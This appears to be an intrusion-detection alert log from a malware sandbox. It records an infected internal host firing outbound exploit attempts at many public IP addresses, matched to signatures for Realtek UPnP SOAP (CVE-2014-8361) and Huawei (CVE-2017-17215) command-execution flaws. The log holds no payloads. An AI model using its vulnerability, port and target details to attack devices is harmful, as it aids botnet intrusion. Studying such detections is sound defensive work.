                                                07/20/24-23:06:35.379204TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5509052869192.168.2.1486.70.141.165
                                                07/20/24-23:05:58.104584TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615359852869192.168.2.1412.166.141.196
                                                07/20/24-23:05:47.105578TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5731437215192.168.2.1441.23.16.189
                                                07/20/24-23:05:37.440705TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5525452869192.168.2.1474.170.109.218
                                                07/20/24-23:05:40.353037TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3508052869192.168.2.14102.139.81.245
                                                07/20/24-23:07:04.503671TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5400852869192.168.2.1492.231.206.3
                                                07/20/24-23:05:45.281029TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4410852869192.168.2.14184.100.90.131
                                                07/20/24-23:06:16.139088TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4354052869192.168.2.1470.151.190.95
                                                07/20/24-23:06:55.227510TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3470452869192.168.2.1441.158.158.125
                                                07/20/24-23:06:08.169080TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24067052869192.168.2.14198.58.66.130
                                                07/20/24-23:06:15.148043TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616069852869192.168.2.14145.81.7.113
                                                07/20/24-23:05:57.223056TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613830452869192.168.2.14102.137.240.137
                                                07/20/24-23:05:34.627062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6069637215192.168.2.14157.227.113.44
                                                07/20/24-23:05:38.418921TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615628252869192.168.2.14141.250.254.239
                                                07/20/24-23:05:48.762153TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3394037215192.168.2.1441.252.117.170
                                                07/20/24-23:05:52.443193TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5635252869192.168.2.1499.220.189.230
                                                07/20/24-23:05:37.470290TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4174252869192.168.2.14129.37.83.27
                                                07/20/24-23:07:03.257276TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24552652869192.168.2.14122.129.207.148
                                                07/20/24-23:06:55.981552TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24401052869192.168.2.14203.105.186.163
                                                07/20/24-23:05:58.929504TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23435252869192.168.2.1463.95.38.63
                                                07/20/24-23:06:01.363153TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5979052869192.168.2.14210.242.56.65
                                                07/20/24-23:06:13.525153TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5354852869192.168.2.14153.7.133.0
                                                07/20/24-23:05:55.858612TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3297837215192.168.2.14157.88.150.54
                                                07/20/24-23:06:22.218849TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5341852869192.168.2.14124.7.34.105
                                                07/20/24-23:05:45.357082TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3363037215192.168.2.1412.197.191.86
                                                07/20/24-23:05:48.787750TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5517037215192.168.2.14197.230.60.205
                                                07/20/24-23:05:59.290948TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5755452869192.168.2.14187.11.67.4
                                                07/20/24-23:06:31.088639TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25741452869192.168.2.144.205.240.59
                                                07/20/24-23:05:35.793562TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5424852869192.168.2.14103.77.206.92
                                                07/20/24-23:05:47.420799TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614860652869192.168.2.1462.154.246.173
                                                07/20/24-23:06:03.151260TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615874452869192.168.2.1482.167.88.16
                                                07/20/24-23:06:11.296188TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613289252869192.168.2.1432.217.195.62
                                                07/20/24-23:07:03.123324TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615356652869192.168.2.14216.254.35.160
                                                07/20/24-23:07:15.422064TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24531252869192.168.2.14107.111.90.22
                                                07/20/24-23:05:59.125247TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5917852869192.168.2.1470.188.135.27
                                                07/20/24-23:05:50.501247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5615437215192.168.2.1441.249.186.31
                                                07/20/24-23:05:38.949221TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5920037215192.168.2.1441.182.111.237
                                                07/20/24-23:05:56.994181TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614996852869192.168.2.1469.166.16.198
                                                07/20/24-23:05:57.029235TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3886652869192.168.2.14207.111.101.15
                                                07/20/24-23:06:01.048493TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614769852869192.168.2.14204.46.229.11
                                                07/20/24-23:05:46.512016TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613950852869192.168.2.14189.78.230.222
                                                07/20/24-23:05:46.447330TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615807852869192.168.2.14147.146.128.242
                                                07/20/24-23:06:02.767606TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24017852869192.168.2.14135.7.73.21
                                                07/20/24-23:06:10.056587TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24909652869192.168.2.142.16.233.94
                                                07/20/24-23:05:59.345950TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615021452869192.168.2.144.205.10.72
                                                07/20/24-23:05:59.823104TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23286452869192.168.2.14150.6.47.69
                                                07/20/24-23:06:01.813486TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25249852869192.168.2.1471.121.141.254
                                                07/20/24-23:05:35.283632TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613972852869192.168.2.1481.143.140.223
                                                07/20/24-23:05:36.324298TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3933237215192.168.2.1441.176.244.105
                                                07/20/24-23:06:01.185323TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5679052869192.168.2.14210.69.210.81
                                                07/20/24-23:06:03.111758TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23887452869192.168.2.14203.213.32.135
                                                07/20/24-23:05:35.286487TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614517252869192.168.2.14210.29.223.179
                                                07/20/24-23:06:15.234952TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6099452869192.168.2.14170.201.6.202
                                                07/20/24-23:05:36.085828TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6052852869192.168.2.14118.75.62.14
                                                07/20/24-23:05:38.143470TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614233652869192.168.2.1418.240.153.218
                                                07/20/24-23:06:38.097414TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25616252869192.168.2.14159.239.108.10
                                                07/20/24-23:05:47.518986TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615713452869192.168.2.14222.40.126.158
                                                07/20/24-23:05:37.556779TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5052252869192.168.2.1477.237.114.164
                                                07/20/24-23:05:57.550045TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614020252869192.168.2.14121.138.29.115
                                                07/20/24-23:06:01.208471TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4409852869192.168.2.1489.143.75.194
                                                07/20/24-23:06:18.422288TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3651052869192.168.2.148.221.108.93
                                                07/20/24-23:05:50.557200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5073037215192.168.2.1438.45.147.13
                                                07/20/24-23:06:00.781631TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5675652869192.168.2.14192.161.140.181
                                                07/20/24-23:05:37.459218TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4296852869192.168.2.14199.49.205.148
                                                07/20/24-23:06:16.855430TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25026252869192.168.2.14210.70.160.242
                                                07/20/24-23:06:08.489738TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5172252869192.168.2.1486.48.13.14
                                                07/20/24-23:07:23.347168TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615525252869192.168.2.14212.254.128.30
                                                07/20/24-23:06:35.442399TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614619252869192.168.2.1485.91.231.93
                                                07/20/24-23:05:52.565127TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5527252869192.168.2.14166.54.252.123
                                                07/20/24-23:05:40.423413TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4081052869192.168.2.14178.152.7.43
                                                07/20/24-23:05:48.795527TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4610637215192.168.2.1419.53.75.198
                                                07/20/24-23:05:58.955037TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3343452869192.168.2.14126.2.43.140
                                                07/20/24-23:06:14.535864TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614981652869192.168.2.14210.70.160.242
                                                07/20/24-23:05:50.501247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5340237215192.168.2.1441.244.48.234
                                                07/20/24-23:05:38.413993TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3346052869192.168.2.14126.238.252.160
                                                07/20/24-23:05:50.555898TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5326037215192.168.2.1478.216.144.147
                                                07/20/24-23:05:48.112749TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613814452869192.168.2.1452.41.95.126
                                                07/20/24-23:06:02.091054TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3542652869192.168.2.14212.217.77.133
                                                07/20/24-23:05:42.220683TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4786437215192.168.2.14157.71.60.191
                                                07/20/24-23:06:16.535822TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23721052869192.168.2.1497.53.99.115
                                                07/20/24-23:07:06.283235TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5864652869192.168.2.14117.166.204.176
                                                07/20/24-23:05:34.627950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5334637215192.168.2.14211.106.125.212
                                                07/20/24-23:05:37.527690TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6081452869192.168.2.14106.140.193.219
                                                07/20/24-23:05:42.131789TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5642637215192.168.2.1441.144.9.179
                                                07/20/24-23:05:39.754007TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3379837215192.168.2.1441.79.135.47
                                                07/20/24-23:06:01.236888TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23996452869192.168.2.1457.81.241.118
                                                07/20/24-23:06:11.426541TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5954452869192.168.2.14117.16.193.167
                                                07/20/24-23:06:29.529818TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615387652869192.168.2.14131.208.192.207
                                                07/20/24-23:06:02.325373TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24365852869192.168.2.14147.154.255.30
                                                07/20/24-23:06:01.260147TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5694252869192.168.2.14188.99.16.192
                                                07/20/24-23:05:56.048573TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5787837215192.168.2.14197.205.42.41
                                                07/20/24-23:05:35.319581TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5424052869192.168.2.14175.80.113.227
                                                07/20/24-23:05:37.453720TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4031452869192.168.2.14135.6.251.247
                                                07/20/24-23:05:35.429320TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615397052869192.168.2.14181.62.64.51
                                                07/20/24-23:05:57.037944TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25966852869192.168.2.14170.235.254.81
                                                07/20/24-23:06:06.186329TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613318652869192.168.2.1441.158.158.125
                                                07/20/24-23:05:38.939890TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5390637215192.168.2.1441.195.17.140
                                                07/20/24-23:06:16.974761TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24239052869192.168.2.14118.110.83.106
                                                07/20/24-23:05:57.156324TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5872652869192.168.2.1467.226.93.72
                                                07/20/24-23:05:47.107735TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4596837215192.168.2.14197.90.150.78
                                                07/20/24-23:05:52.551649TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4372652869192.168.2.14143.164.138.163
                                                07/20/24-23:06:05.174834TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615843852869192.168.2.14140.253.53.98
                                                07/20/24-23:05:34.662485TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3892037215192.168.2.1441.188.190.222
                                                07/20/24-23:06:02.392607TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5342252869192.168.2.14187.171.57.128
                                                07/20/24-23:07:11.843007TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5285837215192.168.2.1441.125.143.114
                                                07/20/24-23:05:52.459685TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25248452869192.168.2.14183.224.136.118
                                                07/20/24-23:05:45.392755TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5737637215192.168.2.1444.79.69.26
                                                07/20/24-23:06:08.365807TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5984052869192.168.2.1499.133.17.148
                                                07/20/24-23:05:38.147601TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615084052869192.168.2.1424.4.155.46
                                                07/20/24-23:05:33.830272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4472237215192.168.2.14157.96.246.174
                                                07/20/24-23:06:11.377268TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5945452869192.168.2.1495.42.47.166
                                                07/20/24-23:06:15.174161TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4270252869192.168.2.14195.40.20.153
                                                07/20/24-23:05:40.365777TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3986652869192.168.2.1495.146.229.83
                                                07/20/24-23:05:34.653253TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5184437215192.168.2.14183.188.212.130
                                                07/20/24-23:05:35.567071TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613352052869192.168.2.14207.28.189.232
                                                07/20/24-23:05:37.444465TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4648852869192.168.2.1459.10.142.189
                                                07/20/24-23:06:03.269499TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3312052869192.168.2.1452.229.50.98
                                                07/20/24-23:05:50.522257TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3697437215192.168.2.14157.133.106.26
                                                07/20/24-23:05:40.255397TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4517252869192.168.2.1499.151.162.57
                                                07/20/24-23:06:01.290865TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25065052869192.168.2.14188.84.165.22
                                                07/20/24-23:05:52.508652TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25474452869192.168.2.14212.222.66.158
                                                07/20/24-23:05:57.032993TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4638252869192.168.2.1436.156.255.210
                                                07/20/24-23:05:39.935123TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5631252869192.168.2.1427.212.16.98
                                                07/20/24-23:06:44.280800TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24433452869192.168.2.1473.67.230.39
                                                07/20/24-23:06:01.951517TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83616032252869192.168.2.1482.59.244.30
                                                07/20/24-23:05:40.359038TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23397052869192.168.2.14168.96.116.176
                                                07/20/24-23:06:11.873559TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25555452869192.168.2.14222.169.26.29
                                                07/20/24-23:05:38.950380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5622237215192.168.2.1441.137.171.5
                                                07/20/24-23:05:48.266573TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4559852869192.168.2.1479.120.206.7
                                                07/20/24-23:05:36.327823TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5523037215192.168.2.14212.102.177.184
                                                07/20/24-23:05:52.644108TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4809252869192.168.2.1425.15.58.154
                                                07/20/24-23:06:05.200381TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5699452869192.168.2.14172.129.77.75
                                                07/20/24-23:06:12.244446TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5911652869192.168.2.14142.226.102.135
                                                07/20/24-23:05:59.845937TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615733852869192.168.2.1459.78.95.157
                                                07/20/24-23:05:36.580139TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3817437215192.168.2.14157.0.36.222
                                                07/20/24-23:05:40.426800TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25220652869192.168.2.14100.202.15.240
                                                07/20/24-23:06:04.523323TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24674652869192.168.2.14114.84.217.191
                                                07/20/24-23:06:42.331305TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4211652869192.168.2.14189.34.115.204
                                                07/20/24-23:05:42.245589TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3572837215192.168.2.14157.150.49.40
                                                07/20/24-23:05:36.048253TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4653252869192.168.2.14177.160.195.13
                                                07/20/24-23:05:52.526128TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4797052869192.168.2.14126.160.124.198
                                                07/20/24-23:05:45.392754TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5174637215192.168.2.14197.159.113.203
                                                07/20/24-23:08:31.687974TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3711652869192.168.2.14217.194.22.37
                                                07/20/24-23:07:08.217282TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24705852869192.168.2.1434.151.91.57
                                                07/20/24-23:06:33.055161TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615831052869192.168.2.1473.142.231.64
                                                07/20/24-23:06:32.540944TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614333852869192.168.2.1431.50.239.211
                                                07/20/24-23:05:39.047547TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5662237215192.168.2.1438.164.85.139
                                                07/20/24-23:05:47.365340TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5538852869192.168.2.1414.188.62.21
                                                07/20/24-23:06:11.207362TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4859452869192.168.2.14206.40.4.199
                                                07/20/24-23:05:59.582686TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4416452869192.168.2.1495.161.141.86
                                                07/20/24-23:05:40.444876TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4655852869192.168.2.14121.140.37.67
                                                07/20/24-23:05:44.273031TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24864252869192.168.2.144.202.29.142
                                                07/20/24-23:06:38.756534TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615664452869192.168.2.14198.235.156.202
                                                07/20/24-23:05:56.056582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4004237215192.168.2.14197.76.13.230
                                                07/20/24-23:05:34.619289TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4364437215192.168.2.14197.170.178.75
                                                07/20/24-23:05:35.201041TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615336652869192.168.2.14187.189.79.198
                                                07/20/24-23:06:29.745087TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26052652869192.168.2.14143.21.232.22
                                                07/20/24-23:05:39.092497TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614237052869192.168.2.14115.51.161.31
                                                07/20/24-23:05:39.770015TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615308252869192.168.2.1434.198.48.42
                                                07/20/24-23:05:38.717242TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615383652869192.168.2.14118.253.173.37
                                                07/20/24-23:05:38.553140TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5189052869192.168.2.1478.197.124.123
                                                07/20/24-23:06:58.705456TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615142052869192.168.2.14211.197.210.31
                                                07/20/24-23:05:58.720996TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24206652869192.168.2.14210.222.196.155
                                                07/20/24-23:06:14.251993TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615589852869192.168.2.1492.139.58.126
                                                07/20/24-23:05:57.797833TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4329252869192.168.2.14179.59.38.175
                                                07/20/24-23:05:46.749345TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3492052869192.168.2.14125.155.98.40
                                                07/20/24-23:06:01.641348TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5307852869192.168.2.14165.171.69.137
                                                07/20/24-23:05:58.880153TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4008252869192.168.2.14128.134.241.5
                                                07/20/24-23:06:03.679529TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4564252869192.168.2.1423.1.60.167
                                                07/20/24-23:05:34.659618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6064437215192.168.2.14106.240.47.148
                                                07/20/24-23:05:46.526701TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614261052869192.168.2.14154.135.195.193
                                                07/20/24-23:05:36.079491TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614328452869192.168.2.14223.210.25.241
                                                07/20/24-23:05:37.453622TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24256252869192.168.2.1489.77.15.240
                                                07/20/24-23:05:46.119639TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4439237215192.168.2.14157.58.95.170
                                                07/20/24-23:05:52.503773TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4406252869192.168.2.14132.178.41.100
                                                07/20/24-23:05:56.022964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5409837215192.168.2.1441.188.89.144
                                                07/20/24-23:05:39.345907TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614902052869192.168.2.14171.41.249.212
